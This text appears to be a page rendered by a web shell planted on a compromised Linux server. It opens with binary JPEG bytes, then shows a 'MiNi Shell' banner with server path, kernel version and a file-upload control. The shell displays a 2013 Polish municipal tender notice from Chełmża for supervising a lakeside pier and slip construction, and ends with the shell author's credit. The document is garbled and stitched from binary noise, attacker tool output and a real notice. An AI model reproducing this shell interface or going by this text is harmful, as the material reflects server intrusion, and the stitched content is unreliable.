JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130314/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20130314/102540-N-2013.html

<p class="kh_header"><b>Chełmża: Prowadzenie nadzoru inwestorskiego  nad realizacją pomostu spacerowego na palach z oświetleniem, slipu, zieleni i dojść do pomostu w ramach zadania inwestycyjnego pn. Budowa, przebudowa i rozbudowa infrastruktury terenów przy Jeziorze Chełmżyńskim będących w granicach administracyjnych miasta, służącej wypoczynkowi, turystyce i rekreacji: etap I - rozbudowa infrastruktury wypoczynkowej.</b><br>
<b>Numer ogłoszenia: 102540 - 2013; data zamieszczenia: 14.03.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Miasto Chełmża , ul. Gen. Hallera 2, 87-140 Chełmża, woj. kujawsko-pomorskie, tel. 056 675-22-91, faks 056 675-21-22.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Prowadzenie nadzoru inwestorskiego  nad realizacją pomostu spacerowego na palach z oświetleniem, slipu, zieleni i dojść do pomostu w ramach zadania inwestycyjnego pn. Budowa, przebudowa i rozbudowa infrastruktury terenów przy Jeziorze Chełmżyńskim będących w granicach administracyjnych miasta, służącej wypoczynkowi, turystyce i rekreacji: etap I - rozbudowa infrastruktury wypoczynkowej..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest pełnienie funkcji inspektora nadzoru inwestorskiego nad realizacją  pomostu spacerowego na palach wzdłuż brzegu Jeziora Chełmżyńskiego prowadzącego od Bulwaru 1000 Lecia do ul. Plażowej. dz. geod.: 198-2 obręb 04, nr 1 obręb 10, nr 5 obręb 12 jedn. ewid. Chełmża
Zakres robót budowlanych: 
2.1.Pomost spacerowy na palach, z trzema wydzielonymi kładkami do cumowania sprzętu pływającego z dwoma łukowymi mostami trójprzęsłowymi. Dźwigary mostów z drewna klejonego  posiadają wymiar 120 x 400 mm i rozpiętość 2 x 10,68 m. Dźwigary  łączone są na budowie na sworznie samowiercące SFS do rozpiętości 21,36 m. Dźwigary z drewna klejonego 120 x 400 mm wspierają się na konstrukcji stalowej poprzez łączniki z blach stalowych gr. 16 mm w formie litery U, spawanych do poziomych elementów stalowych. 
Szerokość blach = szerokości elementu stalowego, wysokość blach = wysokości dźwigara z drewna klejonego. Łączenie na śruby M20 na wysokości 200 mm i 300 mm od dolnej krawędzi dźwigara. Jeden most w części pomostu  nad istniejącą stalową konstrukcją nośną rury poboru wody zakładu cukrowni  Nordzucker.  Drugi most w części pomostu bliżej ul. Plażowej wraz z oświetleniem za pomocą latarni o wys. 5 m odpowiadających swoją charakterystyką, wyglądem latarnią zamontowanym na Bulwarze 1000 Lecia tj.: 
Projektuje się latarnie typu STS/80 z oprawą  oświetleniową Aries 70W. Montaż słupów latarni do konstrukcji pomostu - między skrajnymi stalowymi  podciągami podłużnymi w ich górnej płaszczyźnie przyspawać blachę o wymiarach 46 x200  mm, gr. 16 mm. Słupy latarni  przykręcić 4 śrubami M16 w rozstawie 150 x 150 mm. Montaż rur ochronnych do konstrukcji pomostu wykonać za pomocą uchwytów mocujących.Długość pomostu w osi pali 334,5 m, długość całkowita pomostu z trapem 360,00 m, szerokość pomostu w osi pali 2,24 m, szerokość całkowita pomostu 2,56 m, szerokość  całkowita pomostu z wydzieloną kładką do cumowania sprzętu pływającego 3,22 m, długość kładki do cumowania sprzętu pływającego 10,40 m, szerokość kładki 0,74 m, podstawowy  moduł pomostu w osi pali 5,00 m, wysokość pomostu względem lustra wody + 0,70 m, wysokość kładki do  cumowania sprzętu pływającego względem poziomu lustra wody + 0,45  m, długość pali 10, 12  i 16 m, dopuszczalne użytkowe obciążenie pomostów wynosi 3 kN m2.
Konstrukcje pomostu to układ ram składających się z dwóch pali z rur stalowych O 273-8  bez szwu konstrukcyjnych wg normy EN-10210, gatunek stali S 235JHR, Należy wykonać dodatkowy element stalowy z blachy gr. 8 cm w formie stożka o podstawie średnicy pala i wysokości 1,5 - 2 średnic pala i przyspawać do końcówki rury stalowej.
Rozwiązaniem alternatywnym jest wytoczenie stożka z dębiny, o powyższych
parametrach, z fazowaniem umożliwiającym zamocowanie ostrosłupa w rurze stalowej, wypełnionych betonem B25 w rozstawie 2,24 m, na których wspiera się rura prostokątna  200-120-8 mm lub 250-100-8 będąca konstrukcją wsporczą  pomostu.  Układ ramowy  w rozstawie co 5,0 m. Ramy będą połączone ze sobą przy pomocy 5 podciągów podłużnych  z rury prostokątnej 180-100-7,1. Sposób zabezpieczenia antykorozyjnego elementów stalowych zależy od Wykonawcy. Założenie, że konstrukcja dostarczona będzie z  zabezpieczenie antykorozyjnym, a jedynie łączenie sprefabrykowanych części odbywać się będzie na budowie, wpłynie zdecydowanie na jakość i obniżenie kosztów wykonania oraz ochronę środowiska. Montaż konstrukcji na budowie pomostu oraz slipu nie przewiduje 
ustawienia konstrukcji na łożyskach. Pomost posiada 4 dylatacje wynikające ze zmiany materiału konstrukcji nośnej - dźwigarów z drewna klejonego konstrukcji mostów oraz podciągów podłużnych konstrukcji pomostu. Na podciągach stalowych mocowany będzie pokład z desek pomostowych z tworzywa sztucznego o wymiarach 240 x 14 x 3,2 cm. Deski mocowane do rur prostokątnych podciągów nośnych pomostu przy pomocy wkrętów samogwintujących do stali O 6 mm. W projekcie zachowano wymagane podparcie podłużne  desek wynoszące od 45 - 55 cm. Na szerokości deski stosuje  się jedno lub dwa połączenia. 
Projektant dopuszcza zamocowanie desek z tworzywa sztucznego pośrednio do konstrukcji stalowej poprzez przykręcenie desek pomostu do łat  drewnianych mocowanych do podłużnych podciągów stalowych.
Pale wbijane będą w rozstawie osiowym 2,24 m (na kierunku prostopadłym do osi 
pomostu, oraz 5,0 m  na kierunku równoległym do osi pomostu wg załączonych  
rysunków. Projektuje się pale o długości 10, 12, i 16 metrów.  Projektowaną długość pali należy osiągnąć łącząc maksimum dwa odcinki rury. Spawanie rur należy wykonać spoiną czołową po obwodzie pala - grubość spoiny a = 8 mm. Spoina czołowa o symbolu Y wg PN-79-M-01143. Klasa robót spawalniczych I. Sprawdzenie spoin losowo metodą ultradźwiękową lub radiologiczną 10% pali. Pale po wbiciu do rzędnej projektowanej należy  obciąć po zniwelowaniu rzędnej, wypełnić betonem B25 i zamknąć głowicę blachą O 273 x 10, która będzie blachą podstawy dla stalowej konstrukcji nośnej. Barierki pomostu  w  konstrukcji drewnianej. Klasa drewna I, klasa wytrzymałości C27.  Impregnacja balustrad - 
ciśnieniowa. Zaprojektowano połączenie drewnianego słupka balustrady z podciągami podłużnymi stalowymi poprzez prefabrykowane uchwyty w formie litery U z zaślepieniem od spodu, z blachy gr. 8 mm, przykręcane do konstrukcji stalowej. Słupki łączone czołowo z  uchwytem dwoma wkrętami do drewna M10.

2.2.Budowa slipu
Rama slipu ze stalowych rur prostokątnych 160x80x5 ocynkowanych. Środkowa część ramy wypełniona deskami pomostowymi z tworzywa sztucznego 240x14x3,2 cm, deski  należy pokryć gumą grubości 8 mm, zbrojoną siatką z tworzywa sztucznego, szerokości 1,20 m i długości 6,08 m. Mocowanie na wkręty samogwintujące z podkładkami O 8 mm lub pierścieniami zaopatrzonymi w kolce. Wypełnienie części bocznych elementami gretingowymi - stalowymi kratami pomostowymi ocynkowanymi. Projekt przewiduje możliwość zmiany kąta płaszczyzny slipu i ustawienie jej w odpowiedniej pozycji, oraz możliwość demontażu slipu na okres zimowy. Wymiary slipu:  długość 6,08 m, szerokość  
3,68 m
 
2.3.  Slip - zieleń
Ręczne wykonanie trawnika dywanowego siewem z nawożeniem oraz pielęgnacją    
ręczną pow. 12,50 m2. 

2.4.  Slip - utwardzenie  terenu 
Nawierzchnia z kostki kamiennej nieregularnej o wysokości 10 cm na podsypce cementowo - piaskowej 150,0 m2. 

Szczegółowe roboty budowlane podlegające nadzorowi inwestorskiemu określone zostały w specyfikacji technicznej wykonania i odbioru robót, przedmiarach robót i projektach budowlanych i wykonawczych..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 71.52.00.00-9, 71.24.70.00-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 29.11.2016.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający odstapił od wymogu wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>oświadczenie Wykonawcy o spełnieniu warunków udziału w postępowaniu określonych w  art. 22 ust. 1 ustawy Prawo zamówień publicznych - wypełnione i podpisane odpowiednio przez osoby upoważnione do reprezentowania Wykonawcy załącznik nr 2A do SIWZ albo  przez pełnomocnika reprezentującego Wykonawców wspólnie ubiegających się o udzielenie zamówienia załącznik nr 2B do SIWZ. Ocena spełnienia warunków wymaganych od wykonawców zostanie dokonana wg. 
formuły spełnia-nie spełnia na podstawie oświadczeń i dokumentów złożonych przez 
wykonawców.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże, że wykonał a w przypadku świadczeń okresowych lub ciągłych usług również wykonuje nadzór inwestorski w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres działalności jest krótszy - w tym okresie, nad co najmniej jedną robotą  budowlaną, której zakres obejmował  budowę, dobudowę lub rozbudowę pomostów spacerowych lub mostów wraz z ich oświetleniem oraz utwardzonymi dojściami oraz załączy dokumenty potwierdzając, że usługi nadzoru inwestorskiego zostały wykonane lub są  wykonywane należycie. wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również  wykonywanych usług w zakresie niezbędnym do wykazania spełniania warunku wiedzy i  doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy- w tym okresie, z podaniem ich wartości, 
przedmiotu, dat wykonania i odbiorców, na formularzu stanowiącym załącznik nr 5 do SIWZ. Do wykazu winny być dołączone dokumenty potwierdzające, że usługi te zostały wykonane lub są wykonywane należycie;
Ocena spełnienia warunku wymaganego od wykonawców zostanie dokonana wg. 
formuły spełnia-nie spełnia na podstawie oświadczeń i dokumentów złożonych przez 
wykonawców.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli wykonawca wykaże, iż na czas realizacji zamówienia będzie dysponował odpowiednimi osobami zdolnymi do wykonania  zamówienia. Zamawiający wymaga, aby Wykonawca dysponował osobami posiadającymi uprawnienia budowlane do kierowania robotami budowlanymi w poniższych specjalnościach:
- konstrukcyjno - budowlanej, budowa mostów,
- instalacji w zakresie sieci, instalacji i urządzeń elektrycznych elektroenerge- tycznych bez ograniczeń,
-  drogowej.
Wykaz osób, które będą uczestniczyć w wykonaniu zamówienia, w szczególności 
odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowania robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami, na formularzu stanowiącym załącznik nr 6 do SIWZ;
Oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia 
wymienione w załączniku nr 6 do SIWZ) posiadają wymagane uprawnienia, na formularzu stanowiącym załącznik nr 7 do SIWZ ;
Ocena spełnienia warunku wymaganego od wykonawców zostanie dokonana wg. 
formuły spełnia-nie spełnia na podstawie oświadczeń i dokumentów złożonych przez 
wykonawców.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli wykonawca wykaże iż na czas realizacji zamówienia będzie posiadał ubezpieczenie od odpowiedzialności cywilnej na kwotę   200 000,00 zł.
Ocena spełnienia warunków wymaganych od wykonawców zostanie dokonana wg. 
formuły spełnianie - nie spełnia na podstawie oświadczeń i dokumentów złożonych przez wykonawców.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza możliwość zmian postanowień umowy w stosunku do treści 
oferty, na podstawie której dokonano wyboru Wykonawcy;
Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian:
1.zmiany dotyczące podwykonawców i powierzonego im zakresu prac w stosunku do wskazanego w ofercie;
2.zmiany zakresu nadzorowanych robót tj. zmniejszenia ilości nadzorowanych robót w związku ze zmniejszeniem ilości robót objętych kosztorysem ofertowym;
3.zmiany terminu realizacji przedmiotu umowy w związku ze zmianą terminu realizacji zamówienia polegającego na wykonaniu robót budowlanych oraz innymi okolicznościami nie wynikającymi z winy Wykonawcy;
4.zmiany ustawowej stawki procentowej podatku VAT - obowiązująca stawka podatku VAT wynosi 23%;
5.zmiana osób wymienionych w wykazie osób, które będą uczestniczyć wykonywaniu zamówienia, pod warunkiem posiadania przez następców tych osób doświadczenia i uprawnień, co najmniej równoważnych doświadczeniu i uprawnieniom wskazanych w warunkach udziału w postępowaniu o udzielenie zamówienia publicznego określonych w SIWZ. Zmiana osób może być dokonana w przypadkach: śmierci, choroby lub inych zdarzeń losowych, niewywiązywania się z powierzonych obowiązków lub gdy zmiana  stanie się konieczna z jakichkolwiek innych przyczyn niezależnych od Wykonawcy np. rezygnacji.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.chelmza.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta Chełmży, ul. gen. J. Hallera 2, 87-140 Chełmża, pok. 18 Eugeniusz Szyczewski tel. 639 23 38.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 22.03.2013 godzina 10:30, miejsce: Urząd Miasta Chełmży ul. gen. J Hallera 2, 87-140 Chełmża, pok. nr 2.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Europejski Fundusz Rozwoju Regionalnego w ramach Regionalnego Programu Operacyjnego Województwa Kujawsko-Pomorskiego na lata 2007-2013.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com